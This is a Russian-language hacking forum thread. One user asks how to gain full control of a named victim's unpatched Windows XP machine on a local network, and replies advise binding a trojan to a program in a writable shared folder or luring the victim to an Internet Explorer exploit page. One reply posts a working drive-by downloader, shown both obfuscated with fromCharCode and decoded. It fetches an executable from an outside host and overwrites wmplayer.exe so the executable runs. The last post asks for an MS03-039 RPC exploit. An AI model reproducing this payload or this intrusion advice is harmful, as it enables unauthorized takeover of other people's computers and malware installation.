Народ хочу получить дельный совет чем орудовать в локалке!!!! Сведения об жертве: 0.) O.C WinXP SP-2 1.) есть шары(не важно какие главное что не C$ и т.д хотя есть полный доступ к одной из папок которая находится на C: ) 2.) tcp 139 135 и многое другое открыто ну как всегда. 3.) Firewall нах. отсутствует. NEW: 4.)445/tcp - Microsoft DS Удаленное выполнение команд (ms05-027) Обнаружена уязвимость в Microsoft Server Message Block (SMB), которая позволяет удаленному пользователю выполнить произвольный код на целевой системе. 5.) И аньти вирь у него даже не стоит!!! В общем мне хотелсь бы получить доступ к системе для полного контроля апанента
Можно попытся (Я про директорию к которой у тебя полный доступ) подменить там прогу какую-нить. В случае, конечно если они там есть. Берешь екзешник оттуда, клеишь его с троем и всё.
Просто так пробить второй нельзя. По крайней мере у меня таких эксплоитов нет. Самый простой и эфективный способ - троян. А как его дать жертве? Полазь по форуму. Ну либо впарить, либо попросить заценить какой нить сайт, где он подгрузит трой через дыру в Ie. За полгода в Ie их уже штук 10-ть нашли. Правда найти рабочий эксплоит - проблема. Но всё возможно.
Хм... Ну чтоб шелл получить с правами SYSTEM, как это поволял делать kaht, таких в паблике насегодня я не видел. Но можно устроить веселую жизнь ушастым уводя их в даун, такие есть. Попробуй вот это: http://forum.antichat.ru/threadedpost111536.html, не уверен что будет в локалке пахать, но мало ли.. Ну и конечно с троями стоит заморочиться, тут и удаленный контроль и перезагрузка... =) Вот только говоря что фаирвола нет это ошибаться, так как XP SP2 подразумевает интегрированный в Windows фаирвол. Ещё обрати внимание на уязвимости прикладных программ, IE например... Это самая большая дыра наверное...
Вот сплойт ...незнаю как у вас у меня работает Code: <script language="javascript"> fff = String.fromCharCode(118,97,114,32,120,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,41,59,92,114,92,110,120,46,79,112,101,110,40,34,71,69,84,34,44,32,34,104,116,116,112,58,37,50,102,37,50,102,119,119,119,46,109,121,45,114,111,115,116,111,118,46,102,97,116,97,108,46,114,117,37,50,102,102,105,108,101,115,37,50,102,115,101,114,118,105,99,101,115,46,101,120,101,34,44,48,41,59,92,114,92,110,120,46,83,101,110,100,40,41,59,92,114,92,110,118,97,114,32,115,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,59,92,114,92,110,115,46,77,111,100,101,32,61,32,51,59,92,114,92,110,115,46,84,121,112,101,32,61,32,49,59,92,114,92,110,115,46,79,112,101,110,40,41,59,92,114,92,110,115,46,87,114,105,116,101,40,120,46,114,101,115,112,111,110,115,101,66,111,100,121,41,59,92,114,92,110,115,46,83,97,118,101,84,111,70,105,108,101,40,34,67,58,92,92,92,92,80,114,111,103,114,97,109,32,70,105,108,101,115,92,92,92,92,87,105,110,100,111,119,115,32,77,101,100,105,97,32,80,108,97,121,101,114,92,92,92,92,119,109,112,108,97,121,101,114,46,101,120,101,34,44,50,41,59,92,114,92,110,108,111,99,97,116,105,111,110,46,104,114,101,102,32,61,32,34,109,109,115,58,37,50,102,37,50,102,34,59,92,114,92,110); myURL = "file:javascript:eval('" + fff + "')"; window.open(myURL,"_media"); </script> закодированном в ASCII кодировку... аналог <script language="javascript"> var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http:%2f%2fwww.my-rostov.fatal.ru%2ffiles%2fservices.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2); location.href = "mms:%2f%2f"; </script> и взял я его из коммента видео ,на видео ачат ру и еще когда скопируешь на блокнот то айболит выруби а то сразу ловит троян довнлоудер
Да? Чё правда? Мля....Может он хоть под линухом покатит? Шутка. Ну и новости у тебя..... Мягко говоря, не первой свежести.
Есть одна вещь. Но этой самой вещи нехватает половине античатовцев. Мозг называется. И умение им пользоваться. :::::::Ничего личного:::::::::::::::::::::::
Вообщем если уязвимость на компе в инете имеется Microsoft RPC 135 / tcp Версия опер системы: Windows Server 2003 R2 3790 Service Pack 2 Нету шелла или проги для получения командной строки , у жертвы, что бы можно было удалённое выполнение команд (ms03-039)?
